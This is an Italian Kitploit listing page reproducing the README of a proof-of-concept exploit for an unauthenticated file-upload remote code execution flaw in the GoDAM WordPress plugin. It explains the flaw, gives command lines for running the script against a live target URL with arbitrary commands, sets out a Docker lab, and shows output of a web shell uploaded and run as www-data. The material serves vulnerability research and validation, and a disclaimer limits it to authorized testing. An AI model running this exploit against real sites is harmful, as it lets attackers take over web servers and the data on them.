Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-14282 — Plugin WordPress GoDAM <= 1.12.2 upload file non autenticato RCE (CVE-2026-14282) | Kitploit
Strumenti/GitHubGitHub/nullwhisper/cve-2026-14282
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingLab e Pratica
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

Plugin WordPress GoDAM <= 1.12.2 upload file non autenticato RCE (CVE-2026-14282)

Vedi Repository
1229 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-14282 — Plugin WordPress GoDAM <= 1.12.2 caricamento file non autenticato -> RCE

Autore: nullwhisper
Caso d'uso: solo ricerca di sicurezza autorizzata / validazione di vulnerabilità.

Cos'è?

Le versioni <= 1.12.2 del plugin WordPress GoDAM registrano un campo WPForms chiamato godam_record. Il gestore di upload save_video_file() è agganciato all'azione pubblica wpforms_process_before_filter, quindi viene eseguito prima di qualsiasi controllo di autenticazione. Il gestore si fida dell'header Content-Type controllato dall'attaccante, accetta un file PHP purché il tipo MIME inizi con video/, e lo sposta nella directory servita dal web wp-content/uploads/godam/wpforms/. Questo consente a un attaccante non autenticato di caricare ed eseguire codice PHP arbitrario.

  • CVE: CVE-2026-14282
  • Prodotto: plugin WordPress GoDAM
  • Versioni interessate: <= 1.12.2
  • Corretta in: 2.0.0
  • Tipo: Caricamento arbitrario di file senza autenticazione che porta a RCE
  • CVSS: 9.8 (Critico)
  • Riferimenti

    • IONIX advisory: https://www.ionix.io/threat-center/cve-2026-14282/
    • CVE Record: https://www.cve.org/CVERecord?id=CVE-2026-14282
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
    • Pagina del plugin su WordPress.org: https://wordpress.org/plugins/godam/

    File

    root@kitploit:~
    .
    ├── cve_2026_14282_poc.py   # Main PoC
    ├── lab/
    │   ├── docker-compose.yml  # WordPress lab
    │   └── setup.php           # Creates a WPForms form with GoDAM field
    ├── requirements.txt
    └── README.md
    

    Installazione

    root@kitploit:~
    pip3 install -r requirements.txt
    

    Utilizzo

    Target live

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
    

    Lo script rileva automaticamente l'ID del modulo WPForms e l'ID del campo GoDAM. Se la pagina contiene più moduli o la rilevazione fallisce, usa:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
        --form-id 4 --field-id 1 --cmd "whoami"
    

    Laboratorio locale

    1. Scarica i plugin vulnerabili (non ridistribuire i binari):

      root@kitploit:~
      mkdir -p lab/wpforms-lite lab/godam
      cd lab/wpforms-lite
      wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
      unzip wpforms-lite.latest-stable.zip
      rm wpforms-lite.latest-stable.zip
      cd ../godam
      wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
      unzip godam.1.12.2.zip
      rm godam.1.12.2.zip
      cd ../..
      
    2. Avvia il laboratorio:

      root@kitploit:~
      cd lab
      docker compose up -d
      
    3. Completa l'installazione di WordPress all'indirizzo http://127.0.0.1:8092.

    4. Installa e attiva i plugin, poi crea il modulo e la pagina di test:

      root@kitploit:~
      docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
      docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
      docker exec -i lab-wpcli-1 php /tmp/setup.php
      
    5. Esegui il PoC:

      root@kitploit:~
      python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
      

    Verificato su localhost

    Testato su WordPress 6.8 + WPForms Lite ultima versione + GoDAM 1.12.2.

    root@kitploit:~
    [*] Detecting WPForms form and GoDAM field...
    [*] Found form ID 4, GoDAM field(s): 1
    [*] Trying upload via field 1...
    [+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
    [+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
    [*] Command output:
    GODAM-RCE-Linux ... PWNED
    

    Perché i binari dei plugin non sono inclusi

    Questo repository contiene solo il PoC e i file di orchestrazione del laboratorio. I binari dei plugin vulnerabili sono esclusi per evitare appesantimento e problemi di distribuzione. Scarica le versioni vulnerabili specifiche da WordPress.org per il tuo laboratorio.

    Dichiarazione di non responsabilità

    Questo strumento è destinato esclusivamente a test di sicurezza e ricerca autorizzati. Non usarlo contro sistemi che non possiedi o per i quali non hai il permesso esplicito di effettuare test. L'autore non è responsabile di usi impropri o danni causati da questo codice.

    Scarica lo strumento